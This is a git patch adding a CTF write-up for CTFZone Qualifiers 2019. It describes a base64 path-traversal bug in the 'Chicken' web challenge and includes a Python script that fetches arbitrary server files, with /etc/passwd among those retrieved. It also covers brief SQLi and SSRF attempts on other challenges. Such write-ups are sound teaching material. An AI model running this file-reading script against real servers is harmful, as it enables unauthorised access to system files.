From f463353a0597d7c7cc57fe61f73692747d7dc277 Mon Sep 17 00:00:00 2001 From: Patric Gruber Date: Wed, 18 Dec 2019 11:42:57 +0100 Subject: [PATCH] add theguy/ctfzonequals19.md writeup --- writeups/theguy/ctfzonequals19.md | 115 ++++++++++++++++++++++++++++++ 1 file changed, 115 insertions(+) create mode 100644 writeups/theguy/ctfzonequals19.md diff --git a/writeups/theguy/ctfzonequals19.md b/writeups/theguy/ctfzonequals19.md new file mode 100644 index 0000000..4f96286 --- /dev/null +++ b/writeups/theguy/ctfzonequals19.md @@ -0,0 +1,115 @@ +# CTFZone Qualifiers 2019 +## Retrospective +This CTF was quite frustrating because it felt more like guess-work than anything else. +At least the web challenges were kinda strange. + +## Challenges +### Chicken (Web) +This challenge presented you a website that proudly presents a chicken farm and award-winning chickens. +It showed photos and provided passports that contained the chicken's properties as downloadable file. + +The first vulnerability was quite easy to spot. The url for the passports to download looked something like this: `web-chicken.ctfz.one/File/Download?filename=My50eHQ=` +As you can see quite easily the GET parameter `filename` contained a base64 encoded filename. +It was possible to do a path traversal. There was no sanitization on the value of `filename` what so ever. + +This vulnerability was found about 3 minutes in. In the next few hours the real challenge began. What to retrieve from the server? + +The HTTP-Response from the server contained a header that hinted to "openresty" webserver which is just nginx with LUA support. But the error page when trying to open a non existent file, showed a ASP.NET core error message. + +I tried to download any nginx files, but no luck, because it was not a nginx webserver or just a containerized one. + +So going after the hint of the Asp.NET core service we tried to get interesting files of the service. + +By extensive googeling and some clever fuuzzing from @lavish we found quite some files. +The following is the complete file tree that we found: + +``` +/ + etc + passwd + ??? + Passports + 1.txt + 2.txt + 3.txt + 4.txt + 5.txt + wwwroot + css + site.min.css + js + site.min.js + images + hens + 1.jpg + 2.jpg + 3.jpg + 4.jpg + 5.jpg + Views + Auth + Login.cshtml + Home + Hens.cshtml + Shared + _Layout.cshtml + _CookieConsentPartial.cshtml + Error.cshtml + _ViewImports.cshtml + appsettings.json +``` +The python script I wrote and used to retrieve the files is the following: + +``` +#!/usr/bin/python + +import requests +import base64 + +s = requests.session() +url = "http://web-chicken.ctfz.one/File/Download?filename={}" + +def get_file(filename): + enc = base64.b64encode(filename.encode()).decode() + return s.get(url.format(enc)).text + +if __name__=='__main__': + while True: + content = get_file(input("Path: ")) + print("Content: ",end="") + if "

An error occurred while processing your request.

" in content: + print("Nope") + else: + print() + print(content) + print() +``` +The challenge was written using C# and was a MVC project. +We couldn't retrieve any `.cs` files. There probably was a filter in place. + +Getting to this point already took several hours and then I had to leave afterwards. + +### Bathhouse (Web) +During the CTF I also briefly looked thorugh some other challenges. +One of those was "Bathhouse". + +The challenge description hinted towards being able to make an appointment. +The website was about baths that you can book for a certain date and time. There was a web form that included several input fields that you have to provide. + +I provided some fake information and clicked on the submit button in the believe that there will be some kind of error or warning. But I was greeted by a "Booking successful" message and was greatly confused. I tried some very basic SQLi stuff, but I didn't get anything from it and just left the challenge alone. + +### Mememology (OSINT) +I also looked through this challenge, but at the time of me deciding to look into it it was already nearly solved. I just provided an idea for the last part of the challenge namly the "video part" and the challenge was solved. @matthias did all the work. + +### Zirconium (Web) +This challenge consisted of a webapplication that provided a malware scanner for files. You could upload a file or provide a link where it could be downloaded. +The scanned files could then be downloaded from the website again. + +For me the whole set up screamed SSRF to a local file. I tried providing a webhook link, which worked fine and told me that the used library for the file request was `Python-urllib/3.4` through the request headers. + +You could only provide an url that starts with `http://` and `https://` so simply using `file://` or `local_file://` wasn't going to work. + +I remembered the presentation of Orange Tsai about SSRF and URL parsers called "A new Era of SSRF". I tried several strategies from that presentation. +These tricks didn't work also they weren't that useful since the protocol was fixed. + +After that I remembered a challenge that also used nginx and had a SSRF vulnerability which was filtered for nearly everything. I looked it up in the corresponding mattermost channel. It was the challenge `web-Option-Cmd-U` from the CTF `SECCON 2019`. The trick using `http://nginx/...` also didn't work or at least I wasn't good enough at fuzzing the correct file name. \ No newline at end of file -- 2.43.0